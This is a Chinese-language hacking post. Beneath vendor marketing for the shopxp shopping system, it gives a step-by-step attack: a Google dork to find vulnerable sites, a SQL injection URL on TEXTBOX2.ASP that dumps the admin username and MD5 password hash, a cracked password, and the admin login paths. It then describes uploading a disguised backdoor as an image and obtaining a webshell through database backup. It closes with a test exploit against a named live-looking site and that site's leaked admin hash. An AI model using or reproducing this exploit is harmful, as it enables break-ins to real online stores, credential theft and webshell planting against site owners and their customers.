shopxp网上购物系统购物系统是一个经过完善设计的经典网上购物系统，适用于各种服务器环境的高效网上购物系统解决方案。shopxp网上购物系统是由北京易通联信科技有限公司具有丰富的 web 应用程序设计经验，尤其在购物系统产品及相关领域,经过长期创新性开发,掌握了一整套从算法,数据结构到产品安全性方面的领先技术，使得shopxp购物系统无论在稳定性、负载能力、安全保障等方面都居于国内外同类产品领先地位。
---------------------------------------------------------
第一步：google     inurl:shopxp_news.asp 搜索
第二步：在网址后面加上： /TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin
爆出用户名和密码 注意：用户名和密码是连在一起的，后十六位是密码MD5加密  adminb1481eca94b12f75
等于用户名admin     Md5加密密码：b1481eca94b12f75（解出38983806 ）
第三步：登陆后台：/admin或者/admin_shopxp
第四步：把小马改为图片格式后缀上传
第五步：利用数据库备份搞定webshell

-----------------------------------------------------------------

测试EXP

http://www.0579toys.com//TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%

20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin

admin
4b5ca263b97fad55